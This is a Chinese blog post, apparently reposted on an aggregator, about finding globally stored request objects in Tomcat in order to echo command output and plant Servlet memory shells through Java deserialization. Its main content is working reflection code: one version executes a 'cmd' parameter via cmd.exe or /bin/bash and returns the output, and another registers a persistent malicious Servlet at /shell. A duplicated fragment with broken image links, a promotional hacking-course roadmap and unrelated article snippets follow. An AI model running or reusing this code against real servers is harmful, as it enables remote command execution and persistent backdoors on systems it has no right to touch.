从全局变量寻找到Tomcat回显方式

news2024/11/15 17:25:10

前言

对于回显的获取主要是在ApplicationFilterChain类的lastServicedRequest / lastServicedResponse两个属性,是使用的ThreadLocal进行修饰的,并且,在执行请求的过程中,通过反射修改属性值,能够记录下当前线程的request对象的值。

之后在反序列化利用过程中方便利用ThreadLocal取出对应的request进行内存马的注入关键步骤。

这里转而通过寻找全局存储的request / response进行内存马的注入操作。

正文

如何获取的回显

师傅通过这种方式关注到了org.apache.coyote.AbstractProcessor类中,存在有两个属性值名为request / response分别是使用final修饰的org.apache.coyote.Request / org.apache.coyote.Response类型的变量。

image-20221102202506085.png

我们的目标是注入一个内存马,这里以上篇一样的Servlet内存马举例说明。

对于Servlet内存马,我们需要获取到对应ServletContext,但是在org.apache.coyote.Request类中,并没有直接可以获取的方法存在,我们可以关注到该类的setNote方法的实现。

image-20221102202726283.png

这个方法是用来存放私有数据的,在其中举了一个例子,其中描述了对于该类的notes数组中的下标为1的位置是用来存放的HttpServletRequest对象的,值得注意的是其中的0-8序号存放的是servlet Container中的数据,9-16序号存放的是connector这个组件的数据。

因为只要获取到了HttpServletRequest对象,也就能够调用getServletContext方法获取我们需要的上下文。

我们可以通过getNote(1)来获取,

好了,言归正传,转到获取request对象,

在一个Controller调用过程中,其中的Http11Processor类是继承了AbstractProcessor这个类的。

image-20221102203538541.png

所以我们只需要获取到Http11Processor类对象,我们就能够成功获取到我们需要的request对象

目标放在调用Http11Processor之前是否对该对象进行持久化存储,或者直接点对其中的request对象进行了持久化存储

image-20221102203804487.png

我们进而关注到了AbstractProtocol$ConnectionHandler类中,在调用process方法的过程中调用了register方法对processor对象进行了存储。

image-20221102204331170.png

传入的是processor,他到底是什么,我们可以追溯到该方法的开头,存在有来源。

image-20221102204429536.png

我们可以知道,这个processor对象是获取的是当前的Http11Processor对象,

对于register方法,我们可以跟进一下。

image-20221102204648552.png

首先从processor中获取了RequestInfo对象的信息之后调用了setGlobalProcessor方法。

image-20221102204926999.png

调用了addRequestProcessor方法进行添加。

image-20221102205118001.png

也即是,将其添加进入了processors这个List对象中,

image-20221102205429353.png

所以现在我们的目的是获取到AbstractProtocol$ConnectionHandler类的global属性值,也即是获取到AbstractProtocol这个类对象。

在调用这一步之后看起,发现了在CoyoteAdapter#service方法中,存在有Connector对象的操作。

image-20221102205905726.png

对于Connector对象

image-20221102210101134.png

这是一个connector组件的一个实现,

其中存在有一个protocolHandler属性,是一个ProtocolHandler类对象。

image-20221102210232734.png

前面我们需要获取的是AbstractProtocol类对象,同样是实现了这个接口,

而且于HTTP连接相关的类都实现了这个接口的,

image-20221102210520949.png

所以我们能够从该属性中获取到我们需要的AbstractProtocol对象值,

现在我们需要获取的对象就是一个Connector对象,

而对于连接器的创建,在tomcat容器进行启动的时候,将会调用setConnector方法将connector放在service中去,也即是StandardService类对象。

对于StandardService的获取,我们可以直接从当前线程中进行获取。

image-20221102211439089.png

这样,一条链子进行成了

总结一下:

StandardService>connector>Connector.protocolHandler>Http11NioProtocol.handler>AbstractProtocol$ConnectionHandler.global>RequestGroupInfo.processors>RequestInfo.req

构造回显内存马

非持久化

这种应该也不算是内存马吧,也就是每次发送发序列化数据的时候,通过利用获取的request / response进行命令执行和回显。

对于实验的环境同样使用的是前面一样的环境 – 使用springboot搭建的环境,

我首先创建了一个getField方法方便获取属性值。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BkMyweEN-1676903749903)(https://image.3001.net/images/20221117/1668680244_63760a3476abc1cccbd7a.png!small)]

将具体逻辑放在了static代码块中。

值得注意的有两点

  1. 在进行connector的筛选中,调用了getScheme().toLowerCase().contains("http")方法来帅选和http相关的连接器。

  2. 在命令执行的位置,通过判断有无特征来决定是否执行命令。

image-20221102213238561.png

完整的实现

// 从线程中获取类加载器WebappClassLoaderBase
            WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            // 获取TomcatEmbeddedContext对象
            Context context = contextClassLoader.getResources().getContext();
            // 从上下文中获取ApplicationContext对象
            ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context"));

            // 从Application中获取StandardService对象
            StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service"));

            // 从StandardService中获取Connector数组
            Connector[] connectors = standardService.findConnectors();
            for (Connector connector : connectors) {
                if (connector.getScheme().toLowerCase().contains("http")) {
                    // 获取Connector对象的protocolHandler属性值
                    ProtocolHandler protocolHandler = connector.getProtocolHandler();
                    // 筛选我们需要的Abstract
                    if (protocolHandler instanceof AbstractProtocol) {
                        // 从Http11NioProtocol对象中获取到handler属性,也即是AbstractProtocol中的handler属性,存在有一个getHandler方法可以直接返回
                        // 反射获取该方法
                        Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler");
                        getHandler.setAccessible(true);
                        AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);
                        // 从上面获取的handler中取出global属性值
                        RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global"));
                        // 之后从上面获取的RequestGroupInfo对象中获取到processors这个List对象,元素是RequestInfo对象
                        ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"));
                        // 遍历List中的元素
                        for (Object processor : processors) {
                            RequestInfo requestInfo = (RequestInfo) processor;
                            // 获取对应的Request对象
                            org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"));
                            // 通过不同的请求进行处理
                            if ((req.queryString()).toString().toLowerCase().contains("cmd")) {
                                // 获取对应的Request对象
                                org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1);
                                // 执行希望执行的命令
                                String cmd = request.getParameter("cmd");
                                String[] cmds = null;
                                if (cmd != null) {
                                    if (System.getProperty("os.name").toLowerCase().contains("win")) {
                                        cmds = new String[] {"cmd.exe", "/c", cmd};
                                    } else {
                                        cmds = new String[] {"/bin/bash", "-c", cmd};
                                    }
                                    java.util.Scanner c = new java.util.Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A");
                                    String o = null;
                                    o = c.hasNext() ? c.next() : o;
                                    c.close();
                                    PrintWriter writer = request.getResponse().getWriter();
                                    writer.println(o);
                                    writer.flush();
                                    writer.close();
                                }
                            }

测试一下

首先通过CC6_plus生成序列化数据1.ser

发送给漏洞端。

image-20221102213721803.png

在访问路由中添加了一个cmd的GET传参,最后能够发现,成功执行了的。

持久化

对于持久化也就是真正的内存马实现,主要是通过和前面的Tomcat Servlet内存马相结合的模式,

也即是从request对象中获取到了ServletContext对象来执行恶意逻辑。

完整实现

// 从线程中获取类加载器WebappClassLoaderBase
            WebappClassLoaderBase contextClassLoader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            // 获取TomcatEmbeddedContext对象
            Context context = contextClassLoader.getResources().getContext();
            // 从上下文中获取ApplicationContext对象
            ApplicationContext applicationContext = (ApplicationContext) getField(context, Class.forName("org.apache.catalina.core.StandardContext").getDeclaredField("context"));

            // 从Application中获取StandardService对象
            StandardService standardService = (StandardService) getField(applicationContext, Class.forName("org.apache.catalina.core.ApplicationContext").getDeclaredField("service"));

            // 从StandardService中获取Connector数组
            Connector[] connectors = standardService.findConnectors();
            for (Connector connector : connectors) {
                if (connector.getScheme().toLowerCase().contains("http")) {
                    // 获取Connector对象的protocolHandler属性值
                    ProtocolHandler protocolHandler = connector.getProtocolHandler();
                    // 筛选我们需要的Abstract
                    if (protocolHandler instanceof AbstractProtocol) {
                        // 从Http11NioProtocol对象中获取到handler属性,也即是AbstractProtocol中的handler属性,存在有一个getHandler方法可以直接返回
                        // 反射获取该方法
                        Method getHandler = Class.forName("org.apache.coyote.AbstractProtocol").getDeclaredMethod("getHandler");
                        getHandler.setAccessible(true);
                        AbstractEndpoint.Handler handler = (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);
                        // 从上面获取的handler中取出global属性值
                        RequestGroupInfo global = (RequestGroupInfo) getField(handler, Class.forName("org.apache.coyote.AbstractProtocol$ConnectionHandler").getDeclaredField("global"));
                        // 之后从上面获取的RequestGroupInfo对象中获取到processors这个List对象,元素是RequestInfo对象
                        ArrayList processors = (ArrayList) getField(global, Class.forName("org.apache.coyote.RequestGroupInfo").getDeclaredField("processors"));
                        // 遍历List中的元素
                        for (Object processor : processors) {
                            RequestInfo requestInfo = (RequestInfo) processor;
                            // 获取对应的Request对象
                            org.apache.coyote.Request req = (org.apache.coyote.Request) getField(requestInfo, Class.forName("org.apache.coyote.RequestInfo").getDeclaredField("req"));
                            org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) req.getNote(1);

                            ServletContext servletContext = request.getServletContext();

                            String name = "xxx";
                            if (servletContext.getServletRegistration(name) == null) {
                                StandardContext o = null;

                                // 从 request 的 ServletContext 对象中循环判断获取 Tomcat StandardContext 对象
                                while (o == null) {
                                    Field f = servletContext.getClass().getDeclaredField("context");
                                    f.setAccessible(true);
                                    Object object = f.get(servletContext);

                                    if (object instanceof ServletContext) {
                                        servletContext = (ServletContext) object;
                                    } else if (object instanceof StandardContext) {
                                        o = (StandardContext) object;
                                    }
                                }

                                //自定义servlet
                                Servlet servlet = new TomcatMemshell1();

                                //用Wrapper封装servlet
                                Wrapper newWrapper = o.createWrapper();
                                newWrapper.setName(name);
                                newWrapper.setLoadOnStartup(1);
                                newWrapper.setServlet(servlet);

                                //向children中添加Wrapper
                                o.addChild(newWrapper);
                                //添加servlet的映射
                                o.addServletMappingDecoded("/shell", name);

简单测试一下,

启动反序列漏洞环境,

发送序列化数据,

image-20221102214213112.png

成功进行反序列化,

image-20221102214235912.png

验证是否成功注入,

image-20221102214306886.png

成功创建了一个恶意的Servlet。

Ref

https://github.com/Litch1-v/ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java

https://xz.aliyun.com/t/7348

eg-1676903749904)]

成功进行反序列化,

[外链图片转存中…(img-bYsLbwu5-1676903749905)]

验证是否成功注入,

[外链图片转存中…(img-RndosYZ0-1676903749905)]

成功创建了一个恶意的Servlet。

Ref

https://github.com/Litch1-v/ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java

https://xz.aliyun.com/t/7348

最后

分享一个快速学习【网络安全】的方法,「也许是」最全面的学习方法:
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)

2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

在这里插入图片描述

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k。

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

想要入坑黑客&网络安全的朋友,给大家准备了一份:282G全网最全的网络安全资料包免费领取!
扫下方二维码,免费领取

有了这些基础,如果你要深入学习,可以参考下方这个超详细学习路线图,按照这个路线学习,完全够支撑你成为一名优秀的中高级网络安全工程师:

高清学习路线图或XMIND文件(点击下载原文件)

还有一些学习中收集的视频、文档资源,有需要的可以自取:
每个成长路线对应板块的配套视频:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,需要的可以【扫下方二维码免费领取】

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/359376.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

nginx 代理01(持续更新)

1、如果请求是post,而且请求原是188.188.3.171,处理方式403 if ($request_method ~* "POST") # $request_method 等同于request的method,通常是“GET”或“POST” # 如果访问request的method值为POST则返回“o” {set…

MinIO文件系统

3.2 MinIO 3.2.1 介绍 本项目采用MinIO构建分布式文件系统,MinIO 是一个非常轻量的服务,可以很简单的和其他应用的结合使用,它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份…

基于 SmartX 分布式存储的 iSCSI 与两种 NVMe-oF 技术与性能对比

作者:深耕行业的 SmartX 金融团队本文重点SmartX 分布式块存储 ZBS 提供 2 种存算分离架构下的数据接入协议,分别是 iSCSI 和 NVMe-oF。其中,iSCSI 虽然具有很多优势,但不适合支持高性能的工作负载,这也是 SmartX 选择…

《爆肝整理》保姆级系列教程python接口自动化(十九)--Json 数据处理---实战(详解)

简介 上一篇说了关于json数据处理,是为了断言方便,这篇就带各位小伙伴实战一下。首先捋一下思路,然后根据思路一步一步的去实现和实战,不要一开始就盲目的动手和无头苍蝇一样到处乱撞,撞得头破血流后而放弃了。不仅什么…

Java——位运算符

Java——位运算符起因位运算符1.Java中^ 运算符的目的2.Java中& 0xff运算符的目的3.Java中<< 8运算符的目的起因 写这篇文章的起因是在某个地方需要将字节数组byte[]转16进制数字int。见上一篇文章: 进制转换的一些内容&#xff0c;我写出来的方法长这样。 byte[] …

2. RNN 情感评论鉴定

目录1. 加载购物评论数据集2. 构建 RNN 神经网络&#xff08;DNN、CNN、RNN、GNN&#xff09;3. 多循环神经网络原理分析4. LSTM 原理剖析5. LSTM 与 Bi LSTM1. 加载购物评论数据集 file --> setting --> plugins --> Installed --> 搜索【csv Plugin】即可。 …

【前端】浏览器的渲染流程(完整)

本文主要包含以下内容&#xff1a;浏览器渲染整体流程解析 HTML样式计算布局分层生成绘制指令分块光栅化绘制常见面试题浏览器渲染整体流程浏览器&#xff0c;作为用户浏览网页最基本的一个入口&#xff0c;我们似乎认为在地址栏输入 URL 后网页自动就出来了。殊不知在用户输入…

RocketMQ之(一)RocketMQ入门

一、RocketMQ入门一、RocketMQ 介绍1.1 RocketMQ 是什么&#xff1f;1.2 RocketMQ 应用场景01、应用解耦02、流量削峰03、数据分发1.3 RocketMQ 核心组成01、NameServer02、Broker03、Producer04、Consumer1.6 运转流程1.5 RocketMQ 架构01、NameServer 集群02、Broker 集群03、…

NetApp Cloud Volumes ONTAP 将数据复制到云或从云中复制

NetApp Cloud Volumes ONTAP 将数据复制到云或从云中复制&#xff0c;为开发运营和基于云的灾难恢复提供支持。 无论应用位于何处&#xff0c;都可以使用企业级存储,让云存储基础架构更经济、更智能、更合规且更安全。 为什么选择 NetApp Cloud Volumes ONTAP NetApp Cloud …

RocketMQ 第二章

RocketMQ 第二章 7、SpringBoot整合RocketMQ SpringBoot 提供了快捷操作 RocketMQ 的 RocketMQTemplate 对象。 7.1、引入依赖 注意依赖的版本需要和 RocketMQ 的版本相同。 <dependency><groupId>org.apache.rocketmq</groupId><artifactId>rock…

本地部署element-plus文档

由于一直使用的前端组件element-plus&#xff0c;所以需要经常看文档&#xff0c;但无奈官网实在不给力&#xff0c;经常报503或者404&#xff0c;大大影响效率和心情&#xff0c;忍无可忍就本地化部署一套解决此问题。 百度了一下大多数都是使用 vscode的live server, 或者放…

JAVA保姆式JDBC数据库免费教程之02-连接池技术

连接池 连接池概念 ​ 概念&#xff1a;其实就是一个容器(集合)&#xff0c;存放数据库连接的容器。 当系统初始化好后&#xff0c;容器被创建&#xff0c;容器中会申请一些连接对象&#xff0c;当用户来访问数据库时&#xff0c;从容器中获取连接对象&#xff0c;用户访问完…

【MySQL】MySQL 架构

一、MySQL 架构 C/S 架构&#xff0c;即客户端/服务器架构。服务器程序直接和我们存储的数据打交道&#xff0c;多个客户端连接这个服务器程序。客户端发送请求&#xff0c;服务器响应请求。 MySQL 数据库实例 &#xff1a;即 MySQL 服务器的进程 &#xff08;我们使用任务管理…

Vue组件间通信的四种方式(函数回调,自定义事件,事件总线,消息订阅与发布)

目录 概述 props配置项-回调函数实现 自定义事件实现 事件总线实现 消息订阅与发布实现 概述 在组件化编程中&#xff0c;组件间的通信是重要的&#xff0c;我们可以有四种方式实现组件间的通信。 分别是&#xff1a;函数回调&#xff0c;自定义事件&#xff0c;事件总…

可调恒流驱动LED电路分析

https://www.icxbk.com/article/detail?aid884 常规使用的pwm调亮度不仅会导致频闪&#xff0c;而且在长时间使用的时候&#xff0c;有损坏led的风险&#xff0c;所以这次设计了一个恒流调亮度电路&#xff0c;其电路图如下所示 电路原理的解读&#xff1a; 左侧的电位计起着…

【JavaScript】js实现深拷贝的方法

前言 在js中我们想要实现深拷贝&#xff0c;首先要了解深浅拷贝的区别。 浅拷贝&#xff1a;只是拷贝数据的内存地址&#xff0c;而不是在内存中重新创建一个一模一样的对象&#xff08;数组&#xff09; 深拷贝&#xff1a;在内存中开辟一个新的存储空间&#xff0c;完完全全…

Java语言常用哪些运算符?

之前有个大家讨论过java的数据类型&#xff0c;总体来说类型和其他几种语言也相差无几&#xff0c;我为什么会这样说&#xff1f;我们应该都要知道Python可还有个复数类型。 这里主要给大家讲解Java运算符的分类和使用。 一、运算符分类 说到运算符&#xff0c;我们可以先了…

硬件系统工程师宝典(9)-----如何正确使用去耦电容

各位同学大家好&#xff0c;欢迎继续做客电子工程学习圈&#xff0c;今天我们继续来讲这本书&#xff0c;硬件系统工程师宝典。上篇我们说到在电源完整性分析时&#xff0c;明确噪声来源可以有效的避免、解决噪声问题。今天我们来看看电源完整性分析中重要的一环&#xff0c;去…

【自动化测试】web自动化测试验证码如何测?如何处理验证码问题?解决方案......

目录&#xff1a;导读前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结&#xff08;尾部小惊喜&#xff09;前言 在对安全性有要求的…

线程池ThreadPoolExecutor源码剖析

一、Java构建线程的方式 继承Thread &#xff08;也实现了Runnable&#xff09; 实现Runnable 实现Callable &#xff08;与Runnable区别…&#xff09; 线程池方式 &#xff08;Java提供了构建线程池的方式&#xff09;[可以实现Runnable 和 Callable 功能] Java提供了Exe…